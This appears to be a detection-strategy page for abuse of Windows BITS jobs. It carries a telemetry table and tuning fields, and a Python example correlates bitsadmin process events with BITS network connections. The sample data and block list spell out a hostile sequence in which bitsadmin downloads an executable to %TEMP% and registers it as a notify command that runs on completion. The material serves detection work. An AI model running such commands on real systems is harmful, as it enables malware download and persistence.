Behavioral chain: (1) An actor creates or modifies a BITS job via bitsadmin.exe, PowerShell BITS cmdlets, or COM; (2) the job performs HTTP(S)/SMB network transfers while the owning user is logged on; (3) upon job completion/error, BITS launches a notify command (SetNotifyCmdLine) from svchost.exe -k netsvcs -s BITS, often establishing persistence by keeping long-lived jobs. The strategy correlates process creation, command/script telemetry, BITS-Client operational events, and network connections initiated by BITS.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Security | EventCode=4688 |
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3 |
| Command Execution (DC0064) | WinEventLog:PowerShell | EventCode=4103,4104 |
| Service Creation (DC0060) | WinEventLog:System | EventCode=7036 |

| Field | Description |
|---|---|
| TimeWindow | Correlation window linking job creation, transfer, and notify execution (e.g., 30m–24h depending on environment and BITS retry behavior). |
| ExpectedUpdateHosts | Allow-list of corporate update/CDN endpoints that legitimately use BITS (WSUS, MEMCM, vendor updaters). |
| SuspiciousCliSwitches | BITSAdmin flags of interest (/transfer, /addfile, /SetNotifyCmdLine, /resume, /setcustomheaders, /setminretrydelay). |
| NotifyCmdBlockList | Known risky binaries or folders (e.g., %TEMP%\*.exe, powershell.exe, cmd.exe) used as BITS notify commands. |
| UserContext | Scope by interactive users, service accounts, or high-value targets (admins/servers) to reduce benign noise. |
| ExternalNetCIDRs | Definition of external/non-corp destinations for network correlation. |
| JobLifetimeThreshold | Maximum age or retry count for benign jobs before flagging persistence (e.g., >3 days or retry>20). |
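An added example, not part of the original strategy page, of the correlation the behavioral chain describes: bitsadmin.exe job creation (4688) carrying a suspicious switch is joined, per host and inside TimeWindow, with a block-listed SetNotifyCmdLine value and with BITS-originated Sysmon EID 3 connections that fall outside ExpectedUpdateHosts. The tunable values, hostnames, user names and the five telemetry records are constructed for this example.

```python
import re
from datetime import datetime, timedelta

# Tunables from the strategy's field table; these values are constructed for the example.
TIME_WINDOW = timedelta(hours=1)
EXPECTED_UPDATE_HOSTS = {"wsus.corp.example"}
SUSPICIOUS_CLI_SWITCHES = {"/transfer", "/addfile", "/setnotifycmdline", "/resume",
                           "/setcustomheaders", "/setminretrydelay"}
NOTIFY_CMD_BLOCKLIST = re.compile(r"powershell\.exe|cmd\.exe|%temp%\\\S*\.exe", re.I)

# Constructed sample telemetry (not real logs): Security 4688 and Sysmon EID 3 records normalized to FIELDS.
EVENTS = [
    ("2024-05-01T10:00:00", "4688", "WS01", r"CORP\alice", r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer upd /download http://files.example.net/a.exe %TEMP%\a.exe", None),
    ("2024-05-01T10:00:05", "4688", "WS01", r"CORP\alice", r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /SetNotifyCmdLine upd %TEMP%\a.exe NULL", None),
    ("2024-05-01T10:01:00", "sysmon3", "WS01", r"NT AUTHORITY\SYSTEM", r"C:\Windows\System32\svchost.exe",
     "svchost.exe -k netsvcs -s BITS", "files.example.net"),
    ("2024-05-01T11:30:00", "4688", "WS02", r"CORP\bob", r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer wsus /download http://wsus.corp.example/x.cab C:\Temp\x.cab", None),
    ("2024-05-01T11:31:00", "sysmon3", "WS02", r"NT AUTHORITY\SYSTEM", r"C:\Windows\System32\svchost.exe",
     "svchost.exe -k netsvcs -s BITS", "wsus.corp.example"),
]
FIELDS = ("ts", "type", "host", "user", "image", "cmdline", "dest_host")

def switches(cmdline):
    # Lower-cased set of /switches present on a bitsadmin command line.
    return {tok.lower() for tok in cmdline.split() if tok.startswith("/")}

def correlate(raw_events):
    """Alerts keyed by (host, user): a bitsadmin job creation with a suspicious switch that, within
    TIME_WINDOW, registers a block-listed notify command or has BITS connect to a non-allow-listed host."""
    events = [dict(zip(FIELDS, e)) for e in raw_events]
    bits_net = [e for e in events if e["type"] == "sysmon3" and "-s bits" in e["cmdline"].lower()]
    alerts = {}
    for c in events:
        sw = switches(c["cmdline"])
        if c["type"] != "4688" or not c["image"].lower().endswith("bitsadmin.exe") \
                or not sw & SUSPICIOUS_CLI_SWITCHES:
            continue
        t0, reasons = datetime.fromisoformat(c["ts"]), set()
        if "/setnotifycmdline" in sw and (m := NOTIFY_CMD_BLOCKLIST.search(c["cmdline"])):
            reasons.add(f"notify command matches block list: {m.group(0)}")
        for n in bits_net:  # BITS network activity on the same host inside the correlation window
            if n["host"] == c["host"] and t0 <= datetime.fromisoformat(n["ts"]) <= t0 + TIME_WINDOW \
                    and n["dest_host"].lower() not in EXPECTED_UPDATE_HOSTS:
                reasons.add(f"BITS transfer to non-allow-listed host {n['dest_host']}")
        if reasons:
            alerts.setdefault((c["host"], c["user"]), set()).update(reasons)
    return {k: sorted(v) for k, v in alerts.items()}
```

Bob's WSUS transfer uses a switch on the suspicious list but matches the allow-list and registers no notify command, so it produces no alert; the allow-list is what keeps MEMCM/WSUS traffic out of the results.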